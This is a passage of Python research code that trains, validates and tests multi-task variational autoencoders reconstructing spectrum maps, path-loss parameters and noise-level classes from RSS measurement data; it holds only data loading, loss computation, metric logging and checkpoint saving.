test_noise_level1 = np.squeeze(test_noise_level1)
if noise_level == 'all':
pass
elif noise_level == 'low':
test_input_RSS1 = test_input_RSS1[:500]
test_denoise_RSS1 = test_denoise_RSS1[:500]
test_slf_img1 = test_slf_img1[:500]
test_ab1 = test_ab1[:500]
test_noise_level1 = test_noise_level1[:500]
elif noise_level == 'mid':
test_input_RSS1 = test_input_RSS1[500:1000]
test_denoise_RSS1 = test_denoise_RSS1[500:1000]
test_slf_img1 = test_slf_img1[500:1000]
test_ab1 = test_ab1[500:1000]
test_noise_level1 = test_noise_level1[500:1000]
elif noise_level == 'high':
test_input_RSS1 = test_input_RSS1[1000:]
test_denoise_RSS1 = test_denoise_RSS1[1000:]
test_slf_img1 = test_slf_img1[1000:]
test_ab1 = test_ab1[1000:]
test_noise_level1 = test_noise_level1[1000:]
else:
raise NotImplementedError('Noise level {} not understood.'.format(noise_level))
test_input_RSS1 = torch.from_numpy(test_input_RSS1).float()
test_denoise_RSS1 = torch.from_numpy(test_denoise_RSS1).float()
test_slf_img1 = torch.from_numpy(test_slf_img1).float()
test_ab1 = torch.from_numpy(test_ab1).float()
test_noise_level1 = torch.from_numpy(test_noise_level1).long()
Test_Dataset_1 = TensorDataset(test_input_RSS1, test_denoise_RSS1, test_slf_img1, test_ab1, test_noise_level1)
return Test_Dataset_1
def load_testing_img2(self, RSS_max, RSS_min, RSS_denoise_max, RSS_denoise_min, noise_level='all'):
# Load testing data for image 2
testing_data2 = sio.loadmat('./data/testing_data_image2.mat')
# normalized noisy RSS measurement input (shape: [num_sample, NxPxP])
test_input_RSS2 = testing_data2['RSS']
test_input_RSS2 = (test_input_RSS2 - RSS_min) / (RSS_max - RSS_min)
test_input_RSS2 = test_input_RSS2.reshape(-1, self.args.N, self.args.P, self.args.P)
# normalized clean RSS measurement input (as target for decoder) (shape: [num_sample, NxPxP])
test_denoise_RSS2 = testing_data2['RSS_denoise_norm']
test_denoise_RSS2 = (test_denoise_RSS2 - RSS_denoise_min) / (RSS_denoise_max - RSS_denoise_min)
test_denoise_RSS2 = test_denoise_RSS2.reshape(-1, self.args.N, self.args.P, self.args.P)
# SLF image (shape: [1, K[0]*K[1]])
test_slf_img2 = testing_data2['slf_img']
test_slf_img2 = test_slf_img2.reshape(1, self.args.K0 * self.args.K1)
# SLF image (shape: [num_sample, K[0]*K[1]])
test_slf_img2 = np.tile(test_slf_img2, (test_input_RSS2.shape[0], 1))
# b: bias. alpha: path loss exponent. ab_norm: [b_norm, alpha_norm] (shape: [num_sample, N+1])
test_ab2 = testing_data2['ab_norm']
# noise level classes (shape: [num_sample, 1]) (classes: 0, 1, 2)
test_noise_level2 = testing_data2['sig_epsilon_class']
test_noise_level2 = np.squeeze(test_noise_level2)
if noise_level == 'all':
pass
elif noise_level == 'low':
test_input_RSS2 = test_input_RSS2[:500]
test_denoise_RSS2 = test_denoise_RSS2[:500]
test_slf_img2 = test_slf_img2[:500]
test_ab2 = test_ab2[:500]
test_noise_level2 = test_noise_level2[:500]
elif noise_level == 'mid':
test_input_RSS2 = test_input_RSS2[500:1000]
test_denoise_RSS2 = test_denoise_RSS2[500:1000]
test_slf_img2 = test_slf_img2[500:1000]
test_ab2 = test_ab2[500:1000]
test_noise_level2 = test_noise_level2[500:1000]
elif noise_level == 'high':
test_input_RSS2 = test_input_RSS2[1000:]
test_denoise_RSS2 = test_denoise_RSS2[1000:]
test_slf_img2 = test_slf_img2[1000:]
test_ab2 = test_ab2[1000:]
test_noise_level2 = test_noise_level2[1000:]
else:
raise NotImplementedError('Noise level {} not understood.'.format(noise_level))
test_input_RSS2 = torch.from_numpy(test_input_RSS2).float()
test_denoise_RSS2 = torch.from_numpy(test_denoise_RSS2).float()
test_slf_img2 = torch.from_numpy(test_slf_img2).float()
test_ab2 = torch.from_numpy(test_ab2).float()
test_noise_level2 = torch.from_numpy(test_noise_level2).long()
Test_Dataset_2 = TensorDataset(test_input_RSS2, test_denoise_RSS2, test_slf_img2, test_ab2, test_noise_level2)
return Test_Dataset_2
def train(self, model, train_loader, optimizer, epoch):
model.train()
train_loss = 0 # total loss
train_kld = 0 # total kl-divergence
train_loss_task0 = 0 # loss for reconstruct RSS
train_loss_task1 = 0 # loss for SLF image estimation
train_loss_task2 = 0 # loss for parameters estimation
train_loss_task3 = 0 # loss for noise level prediction
train_acc = 0 # accuracy for noise level prediction
train_kl_loss_w = 0 # kl-divergence for w
train_kl_loss_h = 0 # kl-divergence for h
train_kl_loss_c = 0 # kl-divergence for c
batch_num = int(len(train_loader.dataset) / self.args.batch_size) + 1
batch_10num = batch_num * 10
for batch_idx, (input_RSS, target_RSS, target_SLF, target_ab, target_noise_level) in enumerate(train_loader):
input_RSS = input_RSS.to(self.device)
target_RSS = target_RSS.to(self.device)
target_SLF = target_SLF.to(self.device)
target_ab = target_ab.to(self.device)
target_noise_level = target_noise_level.to(self.device)
optimizer.zero_grad()
KLD, RSS, SLF, ab, noise_level, kl_loss_w, kl_loss_h, kl_loss_c = model(input_RSS)
loss_task0 = F.binary_cross_entropy(RSS, target_RSS, reduction='sum')/(self.args.N * self.args.P * self.args.P)
loss_task1 = F.binary_cross_entropy(SLF, target_SLF, reduction='sum')/(self.args.K0 * self.args.K1)
loss_task2 = F.binary_cross_entropy(ab, target_ab, reduction='sum')/(self.args.N + 1)
loss_task3 = F.cross_entropy(noise_level, target_noise_level, reduction='sum')
loss_weight0 = (((epoch-1) % 20) * batch_num + batch_idx) / batch_10num
loss_weight0 = np.minimum(loss_weight0, self.args.lambda0)
loss = loss_weight0 * KLD + self.args.lambda1 * loss_task0 + self.args.lambda2 * loss_task1\
+ self.args.lambda3 * loss_task2 + self.args.lambda4 * loss_task3
train_loss += loss.item()
train_kld += KLD.item()
train_kl_loss_w += kl_loss_w.item()
train_kl_loss_h += kl_loss_h.item()
train_kl_loss_c += kl_loss_c.item()
train_loss_task0 += loss_task0.item()
train_loss_task1 += loss_task1.item()
train_loss_task2 += loss_task2.item()
train_loss_task3 += loss_task3.item()
_, noise_pred = torch.max(noise_level, 1)
acc_task3 = (noise_pred == target_noise_level).sum()
train_acc += acc_task3.item()
loss /= input_RSS.size(0)
loss.backward()
optimizer.step()
if batch_idx % self.args.log_interval == 0:
print(
'Train Epoch: {} [{}/{} ({:.0f}%)]\tLoss: {:.6f}\tKLD: {:.6f}\tLoss0: {:.6f}\tLoss1: {:.6f}\tLoss2: {:.6f}\tLoss3: {:.6f}\tAcc: {:.6f}'.format(
epoch, batch_idx * len(input_RSS), len(train_loader.dataset),
100. * batch_idx / len(train_loader),
loss.item(),
KLD.item() / len(input_RSS),
loss_task0.item() / len(input_RSS), loss_task1.item() / len(input_RSS),
loss_task2.item() / len(input_RSS), loss_task3.item() / len(input_RSS), acc_task3.item() / len(input_RSS)))
print(
'Train Epoch: {} [{}/{} ({:.0f}%)]\tkld_w: {:.6f}\tkld_h: {:.6f}\tkld_c: {:.6f}'.format(
epoch, batch_idx * len(input_RSS), len(train_loader.dataset),
100. * batch_idx / len(train_loader),
kl_loss_w.item() / len(input_RSS),
kl_loss_h.item() / len(input_RSS),
kl_loss_c.item() / len(input_RSS)))
train_loss /= len(train_loader.dataset)
train_kld /= len(train_loader.dataset)
train_kl_loss_w /= len(train_loader.dataset)
train_kl_loss_h /= len(train_loader.dataset)
train_kl_loss_c /= len(train_loader.dataset)
train_loss_task0 /= len(train_loader.dataset)
train_loss_task1 /= len(train_loader.dataset)
train_loss_task2 /= len(train_loader.dataset)
train_loss_task3 /= len(train_loader.dataset)
train_acc /= len(train_loader.dataset)
print('====> Epoch: {} Average loss: {:.6f}'.format(epoch, train_loss))
print('====> KL divergence: {:.6f}'.format(train_kld))
print('====> KLD_W: {:.6f}'.format(train_kl_loss_w))
print('====> KLD_H: {:.6f}'.format(train_kl_loss_h))
print('====> KLD_C: {:.6f}'.format(train_kl_loss_c))
print('====> RSS loss: {:.6f}'.format(train_loss_task0))
print('====> SLF loss: {:.6f}'.format(train_loss_task1))
print('====> ab loss: {:.6f}'.format(train_loss_task2))
print('====> noise level loss: {:.6f}'.format(train_loss_task3))
print('====> noise level Accuracy: {:.4f}'.format(train_acc))
return train_loss, train_kld, train_loss_task0, train_loss_task1, train_loss_task2, train_loss_task3, train_acc, train_kl_loss_w, train_kl_loss_h, train_kl_loss_c
def validate(self, model, val_loader, epoch):
model.eval()
val_loss = 0 # total loss
val_rmse_slf = 0 # slf reconstruction loss
val_mae_slf = 0 # slf reconstruction loss
batch_num = int(len(val_loader.dataset) / self.args.batch_size) + 1
batch_10num = batch_num * 10
for batch_idx, (input_RSS, target_RSS, target_SLF, target_ab, target_noise_level) in enumerate(val_loader):
input_RSS = input_RSS.to(self.device)
target_RSS = target_RSS.to(self.device)
target_SLF = target_SLF.to(self.device)
target_ab = target_ab.to(self.device)
target_noise_level = target_noise_level.to(self.device)
KLD, RSS, SLF, ab, noise_level, *_ = model(input_RSS)
loss_task0 = F.binary_cross_entropy(RSS, target_RSS, reduction='sum') / (
self.args.N * self.args.P * self.args.P)
loss_task1 = F.binary_cross_entropy(SLF, target_SLF, reduction='sum') / (self.args.K0 * self.args.K1)
loss_task2 = F.binary_cross_entropy(ab, target_ab, reduction='sum') / (self.args.N + 1)
loss_task3 = F.cross_entropy(noise_level, target_noise_level, reduction='sum')
loss_weight0 = (((epoch - 1) % 20) * batch_num + batch_idx) / batch_10num
loss_weight0 = np.minimum(loss_weight0, self.args.lambda0)
loss = 0 * KLD + self.args.lambda1 * loss_task0 + self.args.lambda2 * loss_task1 \
+ self.args.lambda3 * loss_task2 + self.args.lambda4 * loss_task3
val_loss += loss.item()
slf_mse = F.mse_loss(SLF, target_SLF, reduction='sum') / (self.args.K0 * self.args.K1)
slf_mae = F.l1_loss(SLF, target_SLF, reduction='sum') / (self.args.K0 * self.args.K1)
val_rmse_slf += slf_mse.item()
val_mae_slf += slf_mae.item()
val_loss /= len(val_loader.dataset)
val_rmse_slf /= len(val_loader.dataset)
val_rmse_slf = np.sqrt(val_rmse_slf)
val_mae_slf /= len(val_loader.dataset)
print('====> Validation set loss: {:.6f}'.format(val_loss))
print('====> Validation set SLF rmse: {:.6f}'.format(val_rmse_slf))
print('====> Validation set SLF mae: {:.6f}'.format(val_mae_slf))
return val_loss, val_rmse_slf, val_mae_slf
def test(self, model, test_loader, epoch):
model.eval()
test_loss = 0 # total loss
test_kld = 0 # KL-divergence
test_loss_task0 = 0 # loss for reconstruct RSS
test_loss_task1 = 0 # loss for SLF image estimation
test_loss_task2 = 0 # loss for parameters estimation
test_loss_task3 = 0 # loss for noise level prediction
test_kl_loss_w = 0 # kl-divergence for w
test_kl_loss_h = 0 # kl-divergence for h
test_kl_loss_c = 0 # kl-divergence for c
batch_num = int(len(test_loader.dataset) / self.args.batch_size) + 1
batch_10num = batch_num * 10
with torch.no_grad():
for batch_idx, (input_RSS, target_RSS, target_SLF, target_ab, target_noise_level) in enumerate(test_loader):
input_RSS = input_RSS.to(self.device)
target_RSS = target_RSS.to(self.device)
target_SLF = target_SLF.to(self.device)
target_ab = target_ab.to(self.device)
target_noise_level = target_noise_level.to(self.device)
KLD, RSS, SLF, ab, noise_level, kl_loss_w, kl_loss_h, kl_loss_c = model(input_RSS)
loss_task0 = F.binary_cross_entropy(RSS, target_RSS, reduction='sum') / (
self.args.N * self.args.P * self.args.P)
loss_task1 = F.binary_cross_entropy(SLF, target_SLF, reduction='sum') / (self.args.K0 * self.args.K1)
loss_task2 = F.binary_cross_entropy(ab, target_ab, reduction='sum') / (self.args.N + 1)
loss_task3 = F.cross_entropy(noise_level, target_noise_level, reduction='sum')
loss_weight0 = (((epoch - 1) % 20) * batch_num + batch_idx) / batch_10num
loss_weight0 = np.minimum(loss_weight0, self.args.lambda0)
loss = loss_weight0 * KLD + self.args.lambda1 * loss_task0 + self.args.lambda2 * loss_task1 \
+ self.args.lambda3 * loss_task2 + self.args.lambda4 * loss_task3
test_loss += loss.item()
test_kld += KLD.item()
test_kl_loss_w += kl_loss_w.item()
test_kl_loss_h += kl_loss_h.item()
test_kl_loss_c += kl_loss_c.item()
test_loss_task0 += loss_task0.item()
test_loss_task1 += loss_task1.item()
test_loss_task2 += loss_task2.item()
test_loss_task3 += loss_task3.item()
test_loss /= len(test_loader.dataset)
test_kld /= len(test_loader.dataset)
test_kl_loss_w /= len(test_loader.dataset)
test_kl_loss_h /= len(test_loader.dataset)
test_kl_loss_c /= len(test_loader.dataset)
test_loss_task0 /= len(test_loader.dataset)
test_loss_task1 /= len(test_loader.dataset)
test_loss_task2 /= len(test_loader.dataset)
test_loss_task3 /= len(test_loader.dataset)
test_acc = self.test_accuracy(model, test_loader)
print('====> Test set loss: {:.6f}'.format(test_loss))
print('====> Test set KL divergence: {:.6f}'.format(test_kld))
print('====> Test set KLD_W: {:.6f}'.format(test_kl_loss_w))
print('====> Test set KLD_H: {:.6f}'.format(test_kl_loss_h))
print('====> Test set KLD_C: {:.6f}'.format(test_kl_loss_c))
print('====> Test set RSS loss: {:.6f}'.format(test_loss_task0))
print('====> Test set SLF loss: {:.6f}'.format(test_loss_task1))
print('====> Test set ab loss: {:.6f}'.format(test_loss_task2))
print('====> Test set noise level loss: {:.6f}'.format(test_loss_task3))
print('====> Test set noise level Accuracy: {:.4f}'.format(test_acc))
return test_loss, test_kld, test_loss_task0, test_loss_task1, test_loss_task2, test_loss_task3, test_acc, test_kl_loss_w, test_kl_loss_h, test_kl_loss_c
def train_save(self):
model = MGMVAE(M=self.args.M, P=self.args.P, K=(self.args.K0, self.args.K1))
def weights_init(m):
if isinstance(m, torch.nn.Linear) or isinstance(m, torch.nn.Conv2d) or isinstance(m, torch.nn.ConvTranspose2d):
torch.nn.init.xavier_uniform_(m.weight.data)
if m.bias is not None:
torch.nn.init.zeros_(m.bias.data)
model.apply(weights_init)
model = model.to(self.device)
summary(model, input_size=(self.args.batch_size, self.args.N, self.args.P, self.args.P))
train_loader, val_loader, test_loader, test_loader1, test_loader2 = self.load_data()
optimizer = self.get_optimizer(model.parameters())
scheduler = optim.lr_scheduler.ReduceLROnPlateau(optimizer, 'min', factor=0.25, patience=10, min_lr=1e-5)
train_set = []
val_set = []
test_set = [] # for test set
test_set1 = [] # for test image 1
test_set2 = [] # for test image 2
train_loss_path = self.path + 'train_loss_' + str(self.args.n_epochs) + '.npy'
val_loss_path = self.path + 'val_loss_' + str(self.args.n_epochs) + '.npy'
test_loss_path = self.path + 'test_loss_' + str(self.args.n_epochs) + '.npz'
model_path = self.path + 'model_' + str(self.args.n_epochs) + '.pth'
current_val_slf_loss = np.inf
for epoch in range(1, self.args.n_epochs+1):
print("Epoch %d learning rate:%f" % (epoch, optimizer.param_groups[0]['lr']))
train_loss, train_kld, train_loss_task0, train_loss_task1, train_loss_task2, train_loss_task3, train_acc, train_kl_loss_w, train_kl_loss_h, train_kl_loss_c = self.train(
model,
train_loader,
optimizer,
epoch)
train_set.append(
[train_loss, train_kld, train_loss_task0, train_loss_task1, train_loss_task2, train_loss_task3,
train_acc, train_kl_loss_w, train_kl_loss_h, train_kl_loss_c])
print('====> Validation Loss for Epoch {:d}'.format(epoch))
val_loss, val_slf_rmse, val_slf_mae = self.validate(model, val_loader, epoch)
val_set.append([val_loss, val_slf_rmse, val_slf_mae])
scheduler.step(val_loss)
print('====> Test for Epoch {:d}'.format(epoch))
test_loss, test_kld, test_loss_task0, test_loss_task1, test_loss_task2, test_loss_task3, test_acc, test_kl_loss_w, test_kl_loss_h, test_kl_loss_c = self.test(
model,
test_loader, epoch)
test_set.append(
[test_loss, test_kld, test_loss_task0, test_loss_task1, test_loss_task2, test_loss_task3, test_acc,
test_kl_loss_w, test_kl_loss_h, test_kl_loss_c])
print('====> Test Image1 for Epoch {:d}'.format(epoch))
test_loss, test_kld, test_loss_task0, test_loss_task1, test_loss_task2, test_loss_task3, test_acc, test_kl_loss_w, test_kl_loss_h, test_kl_loss_c = self.test(
model,
test_loader1, epoch)
test_set1.append(
[test_loss, test_kld, test_loss_task0, test_loss_task1, test_loss_task2, test_loss_task3, test_acc,
test_kl_loss_w, test_kl_loss_h, test_kl_loss_c])
print('====> Test Image2 for Epoch {:d}'.format(epoch))
test_loss, test_kld, test_loss_task0, test_loss_task1, test_loss_task2, test_loss_task3, test_acc, test_kl_loss_w, test_kl_loss_h, test_kl_loss_c = self.test(
model,
test_loader2, epoch)
test_set2.append(
[test_loss, test_kld, test_loss_task0, test_loss_task1, test_loss_task2, test_loss_task3, test_acc,
test_kl_loss_w, test_kl_loss_h, test_kl_loss_c])
if epoch % self.args.save_freq == 0:
ckpt_path = self.path + '/model' + '_' + str(epoch) + '.pth'
torch.save(model.state_dict(), ckpt_path)
print('checkpoint{}.pth saved!'.format(epoch))
if val_slf_mae < current_val_slf_loss:
torch.save(model.state_dict(), model_path)
current_val_slf_loss = val_slf_mae
train_loss = np.asarray(train_set).reshape(-1, 10)
val_loss = np.asarray(val_set).reshape(-1, 3)
test_loss = np.asarray(test_set).reshape(-1, 10)
test_loss1 = np.asarray(test_set1).reshape(-1, 10)
test_loss2 = np.asarray(test_set2).reshape(-1, 10)
np.save(train_loss_path, train_loss)
np.save(val_loss_path, val_loss)
np.savez(test_loss_path, test_loss=test_loss, test_loss1=test_loss1, test_loss2=test_loss2)
def test_accuracy(self, model, test_loader):
model.eval()
acc = 0
for i, (input_RSS, *_, target_noise_level) in enumerate(test_loader):
input_RSS = input_RSS.to(self.device)
KLD, RSS, SLF, ab, noise_pred, *_ = model(input_RSS) # noise_pred: [batch_size, 3]
noise_pred = noise_pred.detach().cpu().numpy()
noise_pred = np.argmax(noise_pred, axis=1)
labels = target_noise_level.detach().cpu().numpy()
acc += np.sum((noise_pred == labels).astype(int))
acc /= len(test_loader.dataset)
return acc
def test_model(self, noise_level='all'):
model = MGMVAE(M=self.args.M, P=self.args.P, K=(self.args.K0, self.args.K1))
model = model.to(self.device)
model_path = self.path + 'model_' + str(self.args.n_epochs) + '.pth'
model.load_state_dict(torch.load(model_path, map_location=self.device))
model.eval()
*_, test_loader, test_loader1, test_loader2 = self.load_data(noise_level)
noise_class = 0 # noise_class = 0 stands for all noise classes
if noise_level == 'low':
noise_class = 1
elif noise_level == 'mid':
noise_class = 2
elif noise_level == 'high':
noise_class = 3
# test model for testing set
slf_rmse = 0
slf_mae = 0
ab_rmse = 0
for batch_idx, (input_RSS, target_RSS, target_SLF, target_ab, target_noise_level) in enumerate(
test_loader):
input_RSS = input_RSS.to(self.device)
target_RSS = target_RSS.to(self.device)
target_SLF = target_SLF.to(self.device)
target_ab = target_ab.to(self.device)
target_noise_level = target_noise_level.to(self.device)
KLD, RSS, SLF, ab, noise_pred, *_ = model(input_RSS)
# plot SLF reconstruction image for image1
n = min(target_RSS.size(0), 8)
comparison = torch.cat([target_SLF.view(target_RSS.size(0), 1, self.args.K0, self.args.K1)[:n],
SLF.view(SLF.size(0), 1, self.args.K0, self.args.K1)[:n]])
save_image(comparison.cpu(),
self.path + 'reconstruction_SLF_noise' + str(noise_class) + '_' + str(batch_idx) + '.png',
nrow=n)
# test SLF image RMSE
slf_rmse += F.mse_loss(SLF, target_SLF, reduction='sum').item() / (self.args.K0 * self.args.K1)
# test SLF image MAE
slf_mae += F.l1_loss(SLF, target_SLF, reduction='sum').item() / (self.args.K0 * self.args.K1)
# test ab parameters RMSE
ab_rmse += F.mse_loss(ab, target_ab, reduction='sum').item() / (self.args.N + 1)
slf_rmse /= len(test_loader.dataset)
slf_rmse = np.sqrt(slf_rmse)
slf_mae /= len(test_loader.dataset)
ab_rmse /= len(test_loader.dataset)
ab_rmse = np.sqrt(ab_rmse)
noise_acc = self.test_accuracy(model, test_loader)
print('====> Test for Testing Set:')
print('====> Noise_level: ' + noise_level)
print('====> Test set SLF rmse: {:.6f}'.format(slf_rmse))
print('====> Test set SLF mae: {:.6f}'.format(slf_mae))
print('====> Test set ab rmse: {:.6f}'.format(ab_rmse))
print('====> Test set noise level Accuracy: {:.4f}'.format(noise_acc))
# test model for image 1
slf_rmse = 0
slf_mae = 0
ab_rmse = 0
for batch_idx, (input_RSS, target_RSS, target_SLF, target_ab, target_noise_level) in enumerate(test_loader1):
input_RSS = input_RSS.to(self.device)
target_RSS = target_RSS.to(self.device)
target_SLF = target_SLF.to(self.device)
target_ab = target_ab.to(self.device)
target_noise_level = target_noise_level.to(self.device)
KLD, RSS, SLF, ab, noise_pred, *_ = model(input_RSS)
# plot SLF reconstruction image for image1
n = min(target_RSS.size(0), 8)
comparison = torch.cat([target_SLF.view(target_RSS.size(0), 1, self.args.K0, self.args.K1)[:n],
SLF.view(SLF.size(0), 1, self.args.K0, self.args.K1)[:n]])
save_image(comparison.cpu(),
self.path + 'reconstruction_SLF1_noise' + str(noise_class) + '_' + str(batch_idx) + '.png',
nrow=n)
# test SLF image RMSE
slf_rmse += F.mse_loss(SLF, target_SLF, reduction='sum').item() / (self.args.K0 * self.args.K1)
# test SLF image MAE
slf_mae += F.l1_loss(SLF, target_SLF, reduction='sum').item() / (self.args.K0 * self.args.K1)
# test ab parameters RMSE
ab_rmse += F.mse_loss(ab, target_ab, reduction='sum').item() / (self.args.N + 1)
slf_rmse /= len(test_loader1.dataset)
slf_rmse = np.sqrt(slf_rmse)
slf_mae /= len(test_loader1.dataset)
ab_rmse /= len(test_loader1.dataset)
ab_rmse = np.sqrt(ab_rmse)
noise_acc = self.test_accuracy(model, test_loader1)
print('====> Test for image 1:')
print('====> Noise_level: ' + noise_level)
print('====> Test set SLF rmse: {:.6f}'.format(slf_rmse))
print('====> Test set SLF mae: {:.6f}'.format(slf_mae))
print('====> Test set ab rmse: {:.6f}'.format(ab_rmse))
print('====> Test set noise level Accuracy: {:.4f}'.format(noise_acc))
# test model for image 2
slf_rmse = 0
slf_mae = 0
ab_rmse = 0
for batch_idx, (input_RSS, target_RSS, target_SLF, target_ab, target_noise_level) in enumerate(test_loader2):
input_RSS = input_RSS.to(self.device)
target_RSS = target_RSS.to(self.device)
target_SLF = target_SLF.to(self.device)
target_ab = target_ab.to(self.device)
target_noise_level = target_noise_level.to(self.device)
KLD, RSS, SLF, ab, noise_pred, *_ = model(input_RSS)
# plot SLF reconstruction image for image1
n = min(target_RSS.size(0), 8)
comparison = torch.cat([target_SLF.view(target_RSS.size(0), 1, self.args.K0, self.args.K1)[:n],
SLF.view(SLF.size(0), 1, self.args.K0, self.args.K1)[:n]])
save_image(comparison.cpu(),
self.path + 'reconstruction_SLF2_noise' + str(noise_class) + '_' + str(batch_idx) + '.png',
nrow=n)
# test SLF image RMSE
slf_rmse += F.mse_loss(SLF, target_SLF, reduction='sum').item() / (self.args.K0 * self.args.K1)
# test SLF image MAE
slf_mae += F.l1_loss(SLF, target_SLF, reduction='sum').item() / (self.args.K0 * self.args.K1)
# test ab parameters RMSE
ab_rmse += F.mse_loss(ab, target_ab, reduction='sum').item() / (self.args.N + 1)
slf_rmse /= len(test_loader2.dataset)
slf_rmse = np.sqrt(slf_rmse)
slf_mae /= len(test_loader2.dataset)
ab_rmse /= len(test_loader2.dataset)
ab_rmse = np.sqrt(ab_rmse)
noise_acc = self.test_accuracy(model, test_loader2)
print('====> Test for image 2:')
print('====> Noise_level: ' + noise_level)
print('====> Test set SLF rmse: {:.6f}'.format(slf_rmse))
print('====> Test set SLF mae: {:.6f}'.format(slf_mae))
print('====> Test set ab rmse: {:.6f}'.format(ab_rmse))
print('====> Test set noise level Accuracy: {:.4f}'.format(noise_acc))
# runner for Multi-task Laplacian Mixture VAE
class MLMVAE_runner():
def __init__(self, args):
self.args = args
cuda_flag = not self.args.no_cuda and torch.cuda.is_available()
self.device = torch.device("cuda" if cuda_flag else "cpu")
torch.manual_seed(self.args.seed)
random.seed(self.args.seed)
self.path = self.args.run + 'MLMVAE/'
if not os.path.exists(self.path):
os.makedirs(self.path)
def get_optimizer(self, parameters):
if self.args.optimizer == 'Adam':
return optim.Adam(parameters, lr=self.args.lr, weight_decay=self.args.weight_decay, betas=(0.9, 0.999), eps=1e-7)
elif self.args.optimizer == 'RMSProp':
return optim.RMSprop(parameters, lr=self.args.lr, weight_decay=self.args.weight_decay)
elif self.args.optimizer == 'SGD':
return optim.SGD(parameters, lr=self.args.lr, momentum=0.9)
else:
raise NotImplementedError('Optimizer {} not understood.'.format(self.args.optimizer))
def load_data(self, noise_level='all'):
dataset, RSS_max, RSS_min, RSS_denoise_max, RSS_denoise_min = self.load_training_data()
train_size = int(len(dataset) * 0.9)
val_size = int(len(dataset) * 0.1)
dataset_train, dataset_val = random_split(dataset, [train_size, val_size],
generator=torch.Generator().manual_seed(self.args.seed))
dataset_test = self.load_testing_data(RSS_max, RSS_min, RSS_denoise_max, RSS_denoise_min, noise_level)
dataset_test1 = self.load_testing_img1(RSS_max, RSS_min, RSS_denoise_max, RSS_denoise_min, noise_level)
dataset_test2 = self.load_testing_img2(RSS_max, RSS_min, RSS_denoise_max, RSS_denoise_min, noise_level)
train_loader = DataLoader(
dataset_train,
batch_size=self.args.batch_size, shuffle=True, num_workers=2)
val_loader = DataLoader(
dataset_val,
batch_size=self.args.batch_size, shuffle=True, num_workers=2)
test_loader = DataLoader(
dataset_test,
batch_size=self.args.batch_size, shuffle=False, num_workers=2)
test_loader1 = DataLoader(
dataset_test1,
batch_size=self.args.batch_size, shuffle=False, num_workers=2)
test_loader2 = DataLoader(
dataset_test2,
batch_size=self.args.batch_size, shuffle=False, num_workers=2)
print("Data Loaded!")
return train_loader, val_loader, test_loader, test_loader1, test_loader2
def load_training_data(self):
# Load training data
training_data = sio.loadmat('./data/training_data.mat')
# normalized noisy RSS measurement input (shape: [num_sample, NxPxP])
train_input_RSS = training_data['RSS']
RSS_max = np.amax(train_input_RSS, axis=0, keepdims=True)
RSS_min = np.amin(train_input_RSS, axis=0, keepdims=True)
train_input_RSS = (train_input_RSS - RSS_min) / (RSS_max - RSS_min)
train_input_RSS = train_input_RSS.reshape(-1, self.args.N, self.args.P, self.args.P)
# normalized clean RSS measurement input (as target for decoder) (shape: [num_sample, NxPxP])
train_denoise_RSS = training_data['RSS_denoise']
RSS_denoise_max = np.amax(train_denoise_RSS, axis=0, keepdims=True)
RSS_denoise_min = np.amin(train_denoise_RSS, axis=0, keepdims=True)
train_denoise_RSS = (train_denoise_RSS - RSS_denoise_min) / (RSS_denoise_max - RSS_denoise_min)
train_denoise_RSS = train_denoise_RSS.reshape(-1, self.args.N, self.args.P, self.args.P)
# SLF image (shape: [num_sample, K[0]*K[1]])
train_slf_img = training_data['slf_img']
train_slf_img = train_slf_img.reshape(-1, self.args.K0 * self.args.K1)
# b: bias. alpha: path loss exponent. ab_norm: [b_norm, alpha_norm] (shape: [num_sample, N+1])
train_ab = training_data['ab_norm']
# noise level classes (shape: [num_sample, 1]) (classes: 0, 1, 2)
train_noise_level = training_data['sig_epsilon_class']
train_noise_level = np.squeeze(train_noise_level)
train_input_RSS = torch.from_numpy(train_input_RSS).float()
train_denoise_RSS = torch.from_numpy(train_denoise_RSS).float()
train_slf_img = torch.from_numpy(train_slf_img).float()
train_ab = torch.from_numpy(train_ab).float()
train_noise_level = torch.from_numpy(train_noise_level).long()
Train_Dataset = TensorDataset(train_input_RSS, train_denoise_RSS, train_slf_img, train_ab, train_noise_level)
return Train_Dataset, RSS_max, RSS_min, RSS_denoise_max, RSS_denoise_min
def load_testing_data(self, RSS_max, RSS_min, RSS_denoise_max, RSS_denoise_min, noise_level='all'):
# Load testing data
testing_data = sio.loadmat('./data/testing_data.mat')
# noise level classes (shape: [num_sample, 1]) (classes: 0, 1, 2)
test_noise_class = testing_data['sig_epsilon_class']
test_noise_class = np.squeeze(test_noise_class)
idx = (test_noise_class == 0) | (test_noise_class == 1) | (test_noise_class == 2)
if noise_level == 'all':
pass
elif noise_level == 'low':
idx = (test_noise_class == 0)
elif noise_level == 'mid':
idx = (test_noise_class == 1)
elif noise_level == 'high':
idx = (test_noise_class == 2)
else:
raise NotImplementedError('Noise level {} not understood.'.format(noise_level))
test_noise_class = test_noise_class[idx]
# normalized noisy RSS measurement input (shape: [num_sample, NxPxP])
test_input_RSS = testing_data['RSS'][idx]
test_input_RSS = (test_input_RSS - RSS_min) / (RSS_max - RSS_min)
test_input_RSS = test_input_RSS.reshape(-1, self.args.N, self.args.P, self.args.P)
# normalized clean RSS measurement input (as target for decoder) (shape: [num_sample, NxPxP])
test_denoise_RSS = testing_data['RSS_denoise'][idx]
test_denoise_RSS = (test_denoise_RSS - RSS_denoise_min) / (RSS_denoise_max - RSS_denoise_min)
test_denoise_RSS = test_denoise_RSS.reshape(-1, self.args.N, self.args.P, self.args.P)
# SLF image (shape: [1, K[0]*K[1]])
test_slf_img = testing_data['slf_img'][idx]
test_slf_img = test_slf_img.reshape(-1, self.args.K0 * self.args.K1)
# b: bias. alpha: path loss exponent. ab_norm: [b_norm, alpha_norm] (shape: [num_sample, N+1])
test_ab = testing_data['ab_norm'][idx]
test_input_RSS = torch.from_numpy(test_input_RSS).float()
test_denoise_RSS = torch.from_numpy(test_denoise_RSS).float()
test_slf_img = torch.from_numpy(test_slf_img).float()
test_ab = torch.from_numpy(test_ab).float()
test_noise_class = torch.from_numpy(test_noise_class).long()
Test_Dataset = TensorDataset(test_input_RSS, test_denoise_RSS, test_slf_img, test_ab, test_noise_class)
return Test_Dataset
def load_testing_img1(self, RSS_max, RSS_min, RSS_denoise_max, RSS_denoise_min, noise_level='all'):
# Load testing data for image 1
testing_data1 = sio.loadmat('./data/testing_data_image1.mat')
# normalized noisy RSS measurement input (shape: [num_sample, NxPxP])
test_input_RSS1 = testing_data1['RSS']
test_input_RSS1 = (test_input_RSS1 - RSS_min) / (RSS_max - RSS_min)
